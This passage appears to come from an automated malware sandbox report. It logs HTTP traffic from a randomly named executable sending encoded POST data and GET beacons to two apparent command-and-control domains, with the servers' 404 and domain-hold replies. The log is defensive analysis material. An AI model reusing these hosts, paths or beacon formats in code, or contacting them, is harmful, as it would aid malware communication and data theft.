                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.caj-bioteaque.online
                                                                Origin: http://www.caj-bioteaque.online
                                                                Referer: http://www.caj-bioteaque.online/fvpb/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 70 77 5a 62 32 78 65 70 59 68 6a 63 36 59 38 79 6d 62 74 57 45 64 4c 52 33 5a 4d 72 4b 69 7a 68 4b 41 61 39 70 53 66 44 46 44 35 78 4b 39 49 59 4e 63 4c 7a 33 63 64 31 50 4d 4c 71 4f 76 4f 35 76 57 4f 35 54 68 72 2f 65 63 6f 36 42 78 42 4f 6c 35 33 47 4f 71 73 71 62 73 7a 52 51 52 57 2b 57 33 73 63 44 4b 49 71 2b 77 61 73 6f 57 37 72 65 45 4c 36 68 7a 2b 51 78 58 4c 6e 4a 4f 4d 77 53 74 57 47 5a 42 73 2f 59 38 56 67 69 73 69 6c 62 55 67 4b 6e 7a 2f 50 2b 51 52 54 4f 49 41 48 2b 62 4e 69 76 38 73 51 6c 72 58 51 69 49 79 6a 56 5a 53 31 55 42 31 78 75 52 67 55 31 5a 46 4c 52 31 2f 6f 39 37 65 6d 6e 4f 38 66 70 74 38 47 34 75 38 6e 4c 30 30 3d
                                                                Data Ascii: pFYX4n=pwZb2xepYhjc6Y8ymbtWEdLR3ZMrKizhKAa9pSfDFD5xK9IYNcLz3cd1PMLqOvO5vWO5Thr/eco6BxBOl53GOqsqbszRQRW+W3scDKIq+wasoW7reEL6hz+QxXLnJOMwStWGZBs/Y8VgisilbUgKnz/P+QRTOIAH+bNiv8sQlrXQiIyjVZS1UB1xuRgU1ZFLR1/o97emnO8fpt8G4u8nL00=
                                                                Dec 10, 2024 12:20:23.438344955 CET670INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.18.0
                                                                Date: Tue, 10 Dec 2024 11:41:39 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                ETag: W/"5d07e874-36b"
                                                                Content-Encoding: gzip
                                                                Data Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a [TRUNCATED]
                                                                Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.450041212.123.41.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:24.914629936 CET10843OUTPOST /fvpb/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.caj-bioteaque.online
                                                                Origin: http://www.caj-bioteaque.online
                                                                Referer: http://www.caj-bioteaque.online/fvpb/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 70 77 5a 62 32 78 65 70 59 68 6a 63 36 59 38 79 6d 62 74 57 45 64 4c 52 33 5a 4d 72 4b 69 7a 68 4b 41 61 39 70 53 66 44 46 41 5a 78 4a 4b 67 59 4d 2f 7a 7a 32 63 64 31 4d 4d 4c 33 4f 76 4f 6f 76 58 6d 39 54 68 6d 41 65 65 67 36 43 54 35 4f 67 4d 62 47 58 36 73 71 44 63 7a 51 65 78 57 72 57 33 38 51 44 4b 59 71 2b 77 61 73 6f 58 72 72 64 51 58 36 6e 7a 2b 54 6c 48 4c 52 59 2b 4e 74 53 74 2f 39 5a 41 59 46 59 4d 31 67 69 50 61 6c 63 69 38 4b 34 44 2f 4e 35 51 52 4c 4f 49 64 66 2b 62 52 35 76 38 6f 36 6c 73 58 51 75 4f 7a 62 50 64 53 2b 4b 42 74 53 7a 69 4d 42 79 65 52 38 5a 48 76 74 77 4a 72 34 79 66 78 31 75 75 74 69 73 75 46 68 5a 52 65 65 33 2f 70 66 48 4b 72 4e 5a 52 6c 73 67 44 65 32 47 73 78 59 34 31 74 67 68 33 71 2b 76 41 48 6a 6a 52 67 36 4b 37 72 75 2f 70 44 34 66 44 54 59 6f 57 52 6a 75 61 32 34 38 37 79 6e 35 4b 2f 32 6f 45 6c 42 79 34 6f 62 79 75 6a 64 35 41 64 77 35 6a 59 5a 54 53 64 6f 51 4d 41 67 56 6e 4c 44 2b 37 4b 65 6d 4c 6f 62 50 4e 69 33 32 72 30 74 5a 6d 78 [TRUNCATED]
                                                                Data Ascii: pFYX4n=pwZb2xepYhjc6Y8ymbtWEdLR3ZMrKizhKAa9pSfDFAZxJKgYM/zz2cd1MML3OvOovXm9ThmAeeg6CT5OgMbGX6sqDczQexWrW38QDKYq+wasoXrrdQX6nz+TlHLRY+NtSt/9ZAYFYM1giPalci8K4D/N5QRLOIdf+bR5v8o6lsXQuOzbPdS+KBtSziMByeR8ZHvtwJr4yfx1uutisuFhZRee3/pfHKrNZRlsgDe2GsxY41tgh3q+vAHjjRg6K7ru/pD4fDTYoWRjua2487yn5K/2oElBy4obyujd5Adw5jYZTSdoQMAgVnLD+7KemLobPNi32r0tZmxA2cu+y2m4Ix4T1Fgk9l7vPIl8gT15orEGvi9jK04cvQmXk7C0ir4jrlGmLtgMQbx3u2ih27L6qiTEnF5s9Qh5gDrHnHXE8CKHcL5wOOkoALPoh/6d3+D93p62+waDDntILJw9Pzj6qQYw6rXRgyBxegdULCMs3eXJg0fju/wBU0zCt8ZOxfSSuKJZtD5tJFZILJuKt062Ld0WjkV2lGCnGYUpEYz9yTKAwWod05aZ0QT7FRQN3YmDdG21wwb+Q+fvpjkcGNuutiA8fsm2uvIGBYNH+o1TWDQ6uisApnY5dfyJ4lMJBmUwZwN9vHY+G6crF93O1Vk17DRRhUSx1+hHFgv0vbpZYtEEsl7wfKo/GjNVSDy5j6RdCPlJOKl0zKuD5KaBv4/t4w0Ql+K9tunrV5NZ6fsJPjBRpO76fQiM8LfkeYxuERa/FRK/kf0ScqpIcpPeX1PNN4qC8wrvd/g2iNGfmjUtlcB+Le7gJnH1SUb2ShDJrsh1SggymGGOBfhmFE9E4/zA/gy6WjwYpUg8CpZTVheeLYxYwEQmYRUPmXGUQ82pts02gnybKVztsnHMGuSdZ9WqYYIm+/fxibwQzWwBvHzQl6tER0SqS7K6VUDm7YC+D1FzCpro7/SWrdEANv4PK1QgGRmKp4Og3anJrj9kDr1kX/bMx [TRUNCATED]
                                                                Dec 10, 2024 12:20:26.157347918 CET670INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.18.0
                                                                Date: Tue, 10 Dec 2024 11:41:42 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                ETag: W/"5d07e874-36b"
                                                                Content-Encoding: gzip
                                                                Data Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a [TRUNCATED]
                                                                Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.450042212.123.41.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:27.576163054 CET461OUTGET /fvpb/?pFYX4n=kyx71FegbxK9t49DmoExIvfgnNE2IR3bNVDNoxjcJXBTC458PtiM+MxjOLvzJIevsVCTQRubdLAqQTQOooLJWJpRZPL/EUuZT3AOIoIvixzKtl+SfRe7kEU=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.caj-bioteaque.online
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:20:28.835684061 CET1047INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.18.0
                                                                Date: Tue, 10 Dec 2024 11:41:44 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 875
                                                                Connection: close
                                                                ETag: "5d07e874-36b"
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 56 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 43 6f 6e 74 61 63 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6f 6e 20 68 6f 6c 64 20 70 65 6e 64 69 6e 67 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 6f 66 20 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html><head><title>Verification of Contact Information</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>Verification of Contact Information</h1><p>The domain is temporarily on hold pending verification of the email address of the Registrant as per the ICANN rules on Verification of Contact Information.</p><p>More details of these rules can be found at:<br/><a href="http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification">http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification</a>.</p><p>If you are the owner of this domain please contact your provider and request re-verification or follow the instructions emailed to you shortly after your order.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.45004338.47.233.21804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:34.470630884 CET708OUTPOST /dp98/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.qqa79.top
                                                                Origin: http://www.qqa79.top
                                                                Referer: http://www.qqa79.top/dp98/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 6f 79 42 4c 66 47 43 73 51 42 6c 61 47 67 50 72 4a 76 36 7a 4a 48 31 6b 64 69 70 4e 65 31 6b 51 57 4f 74 45 47 59 41 37 39 5a 47 77 61 6d 55 67 6c 4f 64 6e 31 6f 58 54 2f 79 59 48 46 4f 72 51 6d 43 4d 70 48 59 2f 64 64 32 61 63 4c 4d 43 44 48 4b 43 6d 42 57 58 71 5a 47 36 42 76 38 6e 45 45 43 53 46 6e 72 63 72 59 30 66 75 53 32 39 77 62 4f 66 53 4a 39 32 78 41 37 59 75 6a 55 74 71 48 44 58 47 30 42 55 53 32 59 69 32 36 74 4a 6d 72 68 56 68 2b 6b 75 4d 76 65 73 4d 4f 58 56 4a 47 2f 77 58 69 73 57 6f 46 4b 7a 58 32 35 63 35 55 61 57 6f 56 51 39 70 74 5a 41 48 4c 41 4e 68 67 41 3d 3d
                                                                Data Ascii: pFYX4n=oyBLfGCsQBlaGgPrJv6zJH1kdipNe1kQWOtEGYA79ZGwamUglOdn1oXT/yYHFOrQmCMpHY/dd2acLMCDHKCmBWXqZG6Bv8nEECSFnrcrY0fuS29wbOfSJ92xA7YujUtqHDXG0BUS2Yi26tJmrhVh+kuMvesMOXVJG/wXisWoFKzX25c5UaWoVQ9ptZAHLANhgA==
                                                                Dec 10, 2024 12:20:35.983521938 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:20:35 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.45004438.47.233.21804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:37.141226053 CET728OUTPOST /dp98/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.qqa79.top
                                                                Origin: http://www.qqa79.top
                                                                Referer: http://www.qqa79.top/dp98/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 6f 79 42 4c 66 47 43 73 51 42 6c 61 47 42 2f 72 46 73 53 7a 65 33 31 6e 44 79 70 4e 4c 46 6c 62 57 4f 68 45 47 5a 55 72 39 72 53 77 61 44 77 67 6b 4d 6c 6e 35 49 58 54 77 53 5a 44 42 4f 72 68 6d 43 77 4c 48 62 6e 64 64 32 65 63 4c 4d 79 44 48 39 65 6c 43 6d 58 6f 56 6d 36 48 68 63 6e 45 45 43 53 46 6e 72 59 4e 59 30 48 75 54 48 74 77 5a 72 2f 52 58 74 32 77 57 4c 59 75 6e 55 74 75 48 44 57 38 30 41 49 34 32 62 61 32 36 76 52 6d 72 77 56 2b 30 6b 75 4b 79 4f 74 34 64 47 6b 58 4b 75 46 58 67 64 69 77 46 2b 6d 33 33 2f 52 6a 46 72 33 2f 48 51 5a 61 77 65 4a 7a 47 44 77 6f 37 42 45 51 74 79 54 4d 54 6c 54 35 62 52 6c 41 4c 57 61 47 6a 57 30 3d
                                                                Data Ascii: pFYX4n=oyBLfGCsQBlaGB/rFsSze31nDypNLFlbWOhEGZUr9rSwaDwgkMln5IXTwSZDBOrhmCwLHbndd2ecLMyDH9elCmXoVm6HhcnEECSFnrYNY0HuTHtwZr/RXt2wWLYunUtuHDW80AI42ba26vRmrwV+0kuKyOt4dGkXKuFXgdiwF+m33/RjFr3/HQZaweJzGDwo7BEQtyTMTlT5bRlALWaGjW0=
                                                                Dec 10, 2024 12:20:38.656388044 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:20:38 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.45004538.47.233.21804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:39.814157009 CET10810OUTPOST /dp98/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.qqa79.top
                                                                Origin: http://www.qqa79.top
                                                                Referer: http://www.qqa79.top/dp98/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 6f 79 42 4c 66 47 43 73 51 42 6c 61 47 42 2f 72 46 73 53 7a 65 33 31 6e 44 79 70 4e 4c 46 6c 62 57 4f 68 45 47 5a 55 72 39 72 71 77 5a 31 73 67 6b 74 6c 6e 33 6f 58 54 35 79 5a 41 42 4f 72 47 6d 43 6f 50 48 63 75 67 64 7a 43 63 4e 64 53 44 57 59 71 6c 56 57 58 6f 64 47 36 47 76 38 6d 47 45 43 43 42 6e 6f 77 4e 59 30 48 75 54 45 46 77 64 2b 66 52 56 74 32 78 41 37 59 63 6a 55 73 4c 48 44 66 65 30 44 6c 4e 32 4b 36 32 30 76 42 6d 70 43 39 2b 70 55 75 49 7a 4f 74 67 64 47 6f 32 4b 75 5a 68 67 64 57 4b 46 35 4f 33 33 36 31 35 65 49 44 6b 52 79 52 6d 75 76 49 53 4c 52 4d 44 30 47 41 49 73 54 79 52 4c 6e 62 49 54 7a 59 74 63 6d 61 66 35 41 44 74 4e 77 67 42 30 70 48 51 65 61 48 46 42 4f 62 44 7a 36 43 61 47 4f 6d 52 37 6b 4f 74 49 71 39 2b 4c 35 38 56 42 64 64 78 4e 61 6f 61 38 2b 6f 53 58 72 73 63 72 65 5a 55 51 63 33 68 79 33 72 69 67 77 38 6f 42 57 4e 6a 78 4c 67 76 53 64 6d 35 54 6f 46 39 77 62 67 50 58 35 51 74 6f 65 79 39 4f 2f 4c 56 4a 41 6d 55 52 67 46 2f 71 75 70 55 63 4a 74 [TRUNCATED]
                                                                Data Ascii: pFYX4n=oyBLfGCsQBlaGB/rFsSze31nDypNLFlbWOhEGZUr9rqwZ1sgktln3oXT5yZABOrGmCoPHcugdzCcNdSDWYqlVWXodG6Gv8mGECCBnowNY0HuTEFwd+fRVt2xA7YcjUsLHDfe0DlN2K620vBmpC9+pUuIzOtgdGo2KuZhgdWKF5O33615eIDkRyRmuvISLRMD0GAIsTyRLnbITzYtcmaf5ADtNwgB0pHQeaHFBObDz6CaGOmR7kOtIq9+L58VBddxNaoa8+oSXrscreZUQc3hy3rigw8oBWNjxLgvSdm5ToF9wbgPX5Qtoey9O/LVJAmURgF/qupUcJt1w8pD5DDUGISpATo/sMgTogteJHsEskEAbZ112wLXgguxnwBHkaWf/IF0DZbPWAs/pFtSPZnyd1InGsJ9gpIxVcq88fyQt2AgXynhCVMrSPQfd7JwXG5uGq6lj4z4c6qLNdypC1ZHj/R67qQvdyl1Fruz6ZyrN5AqGyEYP69XhW7WUYS+kMwpMBHLyDjuZ9JYo0/IM1ynS6tEt3L8VtwJqQTU31emUf92fXKtwEPXnnMMzRhpkdvfP4Uxk/ZkBNS7KfKlAGQjyPdwqMpGR/6dzSbHoFwRGJ/inQmEk2DCOu/Aw2SUsGY+9Pu/jbvrz1Eoqs+uAvTOG37OpjtKVeAGjnqw3T/BltjIHrbXk3D3boCGZ/r3y0IlHUmKQ14FESaWJT1s55egNzTgD5S4wNudZHTSAXFxZUKFqY3UkcINkm602laYX1Rlz6xTdBbpR+jGsMVd7Ul0MNsh6SZVHQXo1fFFFsmE13C1EDv2EBQ4BRcMlWWXM2AA1BB4FUCRrQXTvD54QSjeCnGoWZBeNHbjp9GV1z+IST/XiAe4xP8TSdWLfd7HJCd9MMO8c4sWOlA0ED9a2MLWTeiv5GqqbA0GtpTvj6IGgBGrlv0ZBFQFqTQeOt6iC7hSdj0RKL5s2FljggU56YB18SPr8GRJzgH7IFxxvbd/I5YOc [TRUNCATED]
                                                                Dec 10, 2024 12:20:41.330569029 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:20:41 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.45004638.47.233.21804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:20:42.477231979 CET450OUTGET /dp98/?pFYX4n=lwprcyOja05feUKXFvnvYGtkNDFrKAw8VdIAG4o6xNOQV3h7ueUE8JDK3GM5Ot7MjRI5G4LHbCuOcNDiB82RYmuufXO00YnTFg6+rJQDeGaEe3laXqmfCqk=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.qqa79.top
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:20:45.184674978 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:20:43 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
